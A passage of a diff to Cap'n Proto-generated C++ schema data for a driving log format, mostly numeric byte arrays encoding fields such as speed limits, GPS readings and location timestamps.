0, 0, 0, 0, 0, 0, 0, 0, - 81, 2, 0, 0, 162, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 84, 2, 0, 0, 3, 0, 1, 0, - 96, 2, 0, 0, 2, 0, 1, 0, - 6, 0, 0, 0, 4, 0, 0, 0, - 0, 0, 1, 0, 6, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 93, 2, 0, 0, 122, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 92, 2, 0, 0, 3, 0, 1, 0, - 104, 2, 0, 0, 2, 0, 1, 0, - 7, 0, 0, 0, 5, 0, 0, 0, - 0, 0, 1, 0, 7, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 101, 2, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 2, 0, 0, 3, 0, 1, 0, - 120, 2, 0, 0, 2, 0, 1, 0, - 8, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 8, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 117, 2, 0, 0, 154, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 120, 2, 0, 0, 3, 0, 1, 0, - 132, 2, 0, 0, 2, 0, 1, 0, - 9, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 1, 0, 9, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 129, 2, 0, 0, 170, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 132, 2, 0, 0, 3, 0, 1, 0, - 160, 2, 0, 0, 2, 0, 1, 0, - 10, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 10, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 157, 2, 0, 0, 242, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 164, 2, 0, 0, 3, 0, 1, 0, - 192, 2, 0, 0, 2, 0, 1, 0, - 11, 0, 0, 0, 2, 0, 0, 0, - 0, 0, 1, 0, 11, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 189, 2, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 196, 2, 0, 0, 3, 0, 1, 0, - 224, 2, 0, 0, 2, 0, 1, 0, - 12, 0, 0, 0, 3, 0, 0, 0, - 0, 0, 1, 0, 12, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 221, 2, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 224, 2, 0, 0, 3, 0, 1, 0, - 236, 2, 0, 0, 2, 0, 1, 0, - 13, 0, 0, 0, 3, 0, 0, 0, - 0, 0, 1, 0, 13, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 233, 2, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 232, 2, 0, 0, 3, 0, 1, 0, - 244, 2, 0, 0, 2, 0, 1, 0, - 14, 0, 0, 0, 4, 0, 0, 0, - 0, 0, 1, 0, 14, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 241, 2, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 240, 2, 0, 0, 3, 0, 1, 0, - 252, 2, 0, 0, 2, 0, 1, 0, - 15, 0, 0, 0, 5, 0, 0, 0, - 0, 0, 1, 0, 15, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 249, 2, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 252, 2, 0, 0, 3, 0, 1, 0, - 8, 3, 0, 0, 2, 0, 1, 0, - 16, 0, 0, 0, 12, 0, 0, 0, - 0, 0, 1, 0, 16, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 3, 0, 0, 106, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 4, 3, 0, 0, 3, 0, 1, 0, - 16, 3, 0, 0, 2, 0, 1, 0, - 17, 0, 0, 0, 13, 0, 0, 0, - 0, 0, 1, 0, 17, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 13, 3, 0, 0, 146, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 16, 3, 0, 0, 3, 0, 1, 0, - 28, 3, 0, 0, 2, 0, 1, 0, - 18, 0, 0, 0, 14, 0, 0, 0, - 0, 0, 1, 0, 18, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 25, 3, 0, 0, 130, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 24, 3, 0, 0, 3, 0, 1, 0, - 36, 3, 0, 0, 2, 0, 1, 0, - 19, 0, 0, 0, 15, 0, 0, 0, - 0, 0, 1, 0, 19, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 33, 3, 0, 0, 210, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 40, 3, 0, 0, 3, 0, 1, 0, - 52, 3, 0, 0, 2, 0, 1, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 86, 97, 108, 105, 100, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 65, 104, 101, 97, 100, 86, - 97, 108, 105, 100, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 65, 104, 101, 97, 100, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 115, 112, 101, 101, 100, 76, 105, 109, - 105, 116, 65, 104, 101, 97, 100, 68, - 105, 115, 116, 97, 110, 99, 101, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 76, 105, 109, 105, 116, 86, 97, - 108, 105, 100, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 1, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 76, 105, 109, 105, 116, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 76, 105, 109, 105, 116, 69, 110, - 100, 68, 105, 115, 116, 97, 110, 99, - 101, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 76, 105, 109, 105, 116, 83, 105, - 103, 110, 0, 0, 0, 0, 0, 0, - 3, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 3, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 76, 105, 109, 105, 116, 115, 65, - 104, 101, 97, 100, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 3, 0, 1, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 76, 105, 109, 105, 116, 115, 65, - 104, 101, 97, 100, 68, 105, 115, 116, - 97, 110, 99, 101, 115, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 3, 0, 1, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 117, 114, 110, 83, 112, 101, 101, - 100, 76, 105, 109, 105, 116, 115, 65, - 104, 101, 97, 100, 83, 105, 103, 110, - 115, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 3, 0, 1, 0, - 3, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 14, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 115, 116, 71, 112, 115, 84, - 105, 109, 101, 115, 116, 97, 109, 112, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 5, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 99, 117, 114, 114, 101, 110, 116, 82, - 111, 97, 100, 78, 97, 109, 101, 0, - 12, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 12, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 115, 116, 71, 112, 115, 76, - 97, 116, 105, 116, 117, 100, 101, 0, - 11, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 11, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 115, 116, 71, 112, 115, 76, - 111, 110, 103, 105, 116, 117, 100, 101, - 0, 0, 0, 0, 0, 0, 0, 0, - 11, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 11, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 115, 116, 71, 112, 115, 83, - 112, 101, 101, 100, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 115, 116, 71, 112, 115, 66, - 101, 97, 114, 105, 110, 103, 68, 101, - 103, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 115, 116, 71, 112, 115, 65, - 99, 99, 117, 114, 97, 99, 121, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 97, 115, 116, 71, 112, 115, 66, - 101, 97, 114, 105, 110, 103, 65, 99, - 99, 117, 114, 97, 99, 121, 68, 101, - 103, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 10, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, } -}; -::capnp::word const* const bp_9854f620f0d3b9cc = b_9854f620f0d3b9cc.words; -#if !CAPNP_LITE -static const uint16_t m_9854f620f0d3b9cc[] = {13, 18, 19, 17, 14, 15, 16, 12, 1, 3, 4, 2, 0, 6, 7, 8, 5, 9, 10, 11}; -static const uint16_t i_9854f620f0d3b9cc[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19}; -const ::capnp::_::RawSchema s_9854f620f0d3b9cc = { - 0x9854f620f0d3b9cc, b_9854f620f0d3b9cc.words, 365, nullptr, m_9854f620f0d3b9cc, - 0, 20, i_9854f620f0d3b9cc, nullptr, nullptr, { &s_9854f620f0d3b9cc, nullptr, nullptr, 0, 0, nullptr } -}; -#endif // !CAPNP_LITE static const ::capnp::_::AlignedData<51> b_ef0382d244f56e38 = { { 0, 0, 0, 0, 5, 0, 6, 0, 56, 110, 245, 68, 210, 130, 3, 239, @@ -27089,17 +26277,17 @@ const ::capnp::_::RawSchema s_a158dd2a4cfaa81b = { 0, 3, i_a158dd2a4cfaa81b, nullptr, nullptr, { &s_a158dd2a4cfaa81b, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<126> b_ac3de5c437be057a = { +static const ::capnp::_::AlignedData<143> b_ac3de5c437be057a = { { 0, 0, 0, 0, 5, 0, 6, 0, 122, 5, 190, 55, 196, 229, 61, 172, - 10, 0, 0, 0, 1, 0, 2, 0, + 10, 0, 0, 0, 1, 0, 3, 0, 91, 40, 164, 37, 126, 241, 177, 243, 3, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 186, 0, 0, 0, 29, 0, 0, 0, 23, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 37, 0, 0, 0, 87, 1, 0, 0, + 37, 0, 0, 0, 143, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 111, 103, 46, 99, 97, 112, 110, @@ -27109,49 +26297,56 @@ static const ::capnp::_::AlignedData<126> b_ac3de5c437be057a = { 38, 126, 80, 178, 21, 230, 9, 190, 1, 0, 0, 0, 58, 0, 0, 0, 88, 89, 68, 97, 116, 97, 0, 0, - 24, 0, 0, 0, 3, 0, 4, 0, + 28, 0, 0, 0, 3, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 153, 0, 0, 0, 66, 0, 0, 0, + 181, 0, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 148, 0, 0, 0, 3, 0, 1, 0, - 160, 0, 0, 0, 2, 0, 1, 0, - 1, 0, 0, 0, 1, 0, 0, 0, + 176, 0, 0, 0, 3, 0, 1, 0, + 188, 0, 0, 0, 2, 0, 1, 0, + 2, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 157, 0, 0, 0, 154, 0, 0, 0, + 185, 0, 0, 0, 154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 160, 0, 0, 0, 3, 0, 1, 0, - 172, 0, 0, 0, 2, 0, 1, 0, - 2, 0, 0, 0, 2, 0, 0, 0, + 188, 0, 0, 0, 3, 0, 1, 0, + 200, 0, 0, 0, 2, 0, 1, 0, + 3, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 169, 0, 0, 0, 138, 0, 0, 0, + 197, 0, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 172, 0, 0, 0, 3, 0, 1, 0, - 184, 0, 0, 0, 2, 0, 1, 0, - 3, 0, 0, 0, 0, 0, 0, 0, + 200, 0, 0, 0, 3, 0, 1, 0, + 212, 0, 0, 0, 2, 0, 1, 0, + 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 181, 0, 0, 0, 74, 0, 0, 0, + 209, 0, 0, 0, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 180, 0, 0, 0, 3, 0, 1, 0, - 208, 0, 0, 0, 2, 0, 1, 0, - 4, 0, 0, 0, 1, 0, 0, 0, + 208, 0, 0, 0, 3, 0, 1, 0, + 236, 0, 0, 0, 2, 0, 1, 0, + 5, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 205, 0, 0, 0, 74, 0, 0, 0, + 233, 0, 0, 0, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 204, 0, 0, 0, 3, 0, 1, 0, - 216, 0, 0, 0, 2, 0, 1, 0, - 5, 0, 0, 0, 2, 0, 0, 0, + 232, 0, 0, 0, 3, 0, 1, 0, + 244, 0, 0, 0, 2, 0, 1, 0, + 6, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 213, 0, 0, 0, 138, 0, 0, 0, + 241, 0, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 216, 0, 0, 0, 3, 0, 1, 0, - 244, 0, 0, 0, 2, 0, 1, 0, + 244, 0, 0, 0, 3, 0, 1, 0, + 16, 1, 0, 0, 2, 0, 1, 0, + 1, 0, 0, 0, 2, 0, 0, 0, + 0, 0, 1, 0, 6, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 13, 1, 0, 0, 138, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 16, 1, 0, 0, 3, 0, 1, 0, + 28, 1, 0, 0, 2, 0, 1, 0, 102, 114, 97, 109, 101, 73, 100, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, @@ -27214,6 +26409,16 @@ static const ::capnp::_::AlignedData<126> b_ac3de5c437be057a = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 111, 99, 97, 116, 105, 111, 110, + 77, 111, 110, 111, 84, 105, 109, 101, + 0, 0, 0, 0, 0, 0, 0, 0, + 9, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, } }; @@ -27222,11 +26427,11 @@ static const ::capnp::_::AlignedData<126> b_ac3de5c437be057a = { static const ::capnp::_::RawSchema* const d_ac3de5c437be057a[] = { &s_be09e615b2507e26, }; -static const uint16_t m_ac3de5c437be057a[] = {5, 2, 3, 0, 1, 4}; -static const uint16_t i_ac3de5c437be057a[] = {0, 1, 2, 3, 4, 5}; +static const uint16_t m_ac3de5c437be057a[] = {5, 2, 3, 0, 6, 1, 4}; +static const uint16_t i_ac3de5c437be057a[] = {0, 1, 2, 3, 4, 5, 6}; const ::capnp::_::RawSchema s_ac3de5c437be057a = { - 0xac3de5c437be057a, b_ac3de5c437be057a.words, 126, d_ac3de5c437be057a, m_ac3de5c437be057a, - 1, 6, i_ac3de5c437be057a, nullptr, nullptr, { &s_ac3de5c437be057a, nullptr, nullptr, 0, 0, nullptr } + 0xac3de5c437be057a, b_ac3de5c437be057a.words, 143, d_ac3de5c437be057a, m_ac3de5c437be057a, + 1, 7, i_ac3de5c437be057a, nullptr, nullptr, { &s_ac3de5c437be057a, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<94> b_be09e615b2507e26 = { @@ -27548,898 +26753,884 @@ const ::capnp::_::RawSchema s_dc24138990726023 = { 0, 4, i_dc24138990726023, nullptr, nullptr, { &s_dc24138990726023, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<2124> b_d314cfd957229c11 = { +static const ::capnp::_::AlignedData<2093> b_d314cfd957229c11 = { { 0, 0, 0, 0, 5, 0, 6, 0, 17, 156, 34, 87, 217, 207, 20, 211, 10, 0, 0, 0, 1, 0, 2, 0, 91, 40, 164, 37, 126, 241, 177, 243, - 1, 0, 7, 0, 0, 0, 123, 0, + 1, 0, 7, 0, 0, 0, 121, 0, 4, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 130, 0, 0, 0, 25, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 95, 27, 0, 0, + 21, 0, 0, 0, 239, 26, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 111, 103, 46, 99, 97, 112, 110, 112, 58, 69, 118, 101, 110, 116, 0, 0, 0, 0, 0, 1, 0, 1, 0, - 244, 1, 0, 0, 3, 0, 4, 0, + 236, 1, 0, 0, 3, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 157, 13, 0, 0, 98, 0, 0, 0, + 101, 13, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 156, 13, 0, 0, 3, 0, 1, 0, - 168, 13, 0, 0, 2, 0, 1, 0, + 100, 13, 0, 0, 3, 0, 1, 0, + 112, 13, 0, 0, 2, 0, 1, 0, 2, 0, 255, 255, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 165, 13, 0, 0, 74, 0, 0, 0, + 109, 13, 0, 0, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 164, 13, 0, 0, 3, 0, 1, 0, - 176, 13, 0, 0, 2, 0, 1, 0, + 108, 13, 0, 0, 3, 0, 1, 0, + 120, 13, 0, 0, 2, 0, 1, 0, 43, 0, 254, 255, 0, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 173, 13, 0, 0, 130, 0, 0, 0, + 117, 13, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 172, 13, 0, 0, 3, 0, 1, 0, - 184, 13, 0, 0, 2, 0, 1, 0, + 116, 13, 0, 0, 3, 0, 1, 0, + 128, 13, 0, 0, 2, 0, 1, 0, 5, 0, 253, 255, 0, 0, 0, 0, 0, 0, 1, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 181, 13, 0, 0, 66, 0, 0, 0, + 125, 13, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 176, 13, 0, 0, 3, 0, 1, 0, - 188, 13, 0, 0, 2, 0, 1, 0, - 94, 0, 252, 255, 0, 0, 0, 0, + 120, 13, 0, 0, 3, 0, 1, 0, + 132, 13, 0, 0, 2, 0, 1, 0, + 92, 0, 252, 255, 0, 0, 0, 0, 0, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 185, 13, 0, 0, 178, 0, 0, 0, + 129, 13, 0, 0, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 188, 13, 0, 0, 3, 0, 1, 0, - 200, 13, 0, 0, 2, 0, 1, 0, + 132, 13, 0, 0, 3, 0, 1, 0, + 144, 13, 0, 0, 2, 0, 1, 0, 6, 0, 251, 255, 0, 0, 0, 0, 0, 0, 1, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 197, 13, 0, 0, 34, 0, 0, 0, + 141, 13, 0, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 192, 13, 0, 0, 3, 0, 1, 0, - 220, 13, 0, 0, 2, 0, 1, 0, + 136, 13, 0, 0, 3, 0, 1, 0, + 164, 13, 0, 0, 2, 0, 1, 0, 59, 0, 250, 255, 0, 0, 0, 0, 0, 0, 1, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 217, 13, 0, 0, 98, 0, 0, 0, + 161, 13, 0, 0, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 216, 13, 0, 0, 3, 0, 1, 0, - 228, 13, 0, 0, 2, 0, 1, 0, + 160, 13, 0, 0, 3, 0, 1, 0, + 172, 13, 0, 0, 2, 0, 1, 0, 7, 0, 249, 255, 0, 0, 0, 0, 0, 0, 1, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 225, 13, 0, 0, 114, 0, 0, 0, + 169, 13, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 224, 13, 0, 0, 3, 0, 1, 0, - 236, 13, 0, 0, 2, 0, 1, 0, - 95, 0, 248, 255, 0, 0, 0, 0, + 168, 13, 0, 0, 3, 0, 1, 0, + 180, 13, 0, 0, 2, 0, 1, 0, + 93, 0, 248, 255, 0, 0, 0, 0, 0, 0, 1, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 233, 13, 0, 0, 162, 0, 0, 0, + 177, 13, 0, 0, 162, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 236, 13, 0, 0, 3, 0, 1, 0, - 8, 14, 0, 0, 2, 0, 1, 0, - 88, 0, 247, 255, 0, 0, 0, 0, + 180, 13, 0, 0, 3, 0, 1, 0, + 208, 13, 0, 0, 2, 0, 1, 0, + 86, 0, 247, 255, 0, 0, 0, 0, 0, 0, 1, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 5, 14, 0, 0, 50, 0, 0, 0, + 205, 13, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 14, 0, 0, 3, 0, 1, 0, - 12, 14, 0, 